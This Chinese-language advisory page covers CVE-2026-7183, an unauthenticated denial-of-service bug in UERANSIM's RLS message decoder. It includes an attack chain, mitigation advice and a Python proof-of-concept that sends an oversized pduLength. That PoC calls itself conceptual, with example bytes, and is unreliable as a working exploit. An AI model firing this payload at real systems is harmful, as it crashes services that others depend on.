CVE-2026-7183 CVSS 5.3 中危

CVE-2026-7183 UERANSIM远程拒绝服务漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7183

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

aligungr UERANSIM

漏洞概述

aligungr UERANSIM 3.2.7及之前版本存在安全漏洞。攻击者可通过网络远程操纵pduLength参数，在处理Radio Link Simulation层消息时触发未捕获异常，导致目标服务崩溃。该漏洞无需认证即可利用，影响系统可用性。

技术细节

该漏洞位于aligungr UERANSIM的src/lib/rls/rls_pdu.cpp文件中的rls::DecodeRlsMessage函数。由于程序未正确校验输入参数pduLength的合法性，攻击者可发送恶意构造的数据包。当系统解析该数据包时，会触发未处理的异常，导致进程异常终止。攻击向量为网络，无需用户交互，成功利用可造成拒绝服务。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络寻找开放的UERANSIM服务端口。

STEP 2

2. 漏洞利用

向目标发送特制的RLS消息包，其中包含恶意构造的pduLength参数。

STEP 3

3. 触发异常

目标服务在rls::DecodeRlsMessage函数中解析数据时触发未捕获异常。

STEP 4

4. 拒绝服务

UERANSIM进程崩溃，导致无线链路模拟服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# Target configuration
TARGET_IP = "192.168.1.100"
TARGET_PORT = 4997  # UERANSIM default RLS port, adjust if needed

def send_exploit():
    try:
        # Create a socket connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_IP, TARGET_PORT))
        
        # Construct malicious payload
        # The vulnerability involves manipulating pduLength to trigger an exception.
        # This is a conceptual representation of a malformed PDU.
        # Header + Malformed Length Field
        malicious_header = b"\x00\x01"  # Example message type
        malicious_pdu_length = b"\xFF\xFF\xFF\xFF"  # Extremely large or invalid length
        
        payload = malicious_header + malicious_pdu_length + b"A" * 100
        
        # Send payload
        s.send(payload)
        print("[+] Malicious payload sent to trigger uncaught exception.")
        
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

影响范围

aligungr UERANSIM <= 3.2.7

防御指南

临时缓解措施

建议限制对UERANSIM服务端口的网络访问，仅允许受信任的IP地址连接。在未升级前，监控服务进程状态以便快速重启。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7183
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7183
3 Details https://www.cvedetails.com/cve/CVE-2026-7183/
4 VulDB https://vuldb.com/cve/CVE-2026-7183
5 Link https://github.com/aligungr/UERANSIM/
6 Link https://github.com/aligungr/UERANSIM/commit/ca1a66fffe282767bb08618af9f848e3b68ea47b
7 Link https://github.com/aligungr/UERANSIM/releases/tag/v3.2.8
8 Link https://vuldb.com/submit/800026
9 Link https://vuldb.com/vuln/359784
10 Link https://vuldb.com/vuln/359784/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表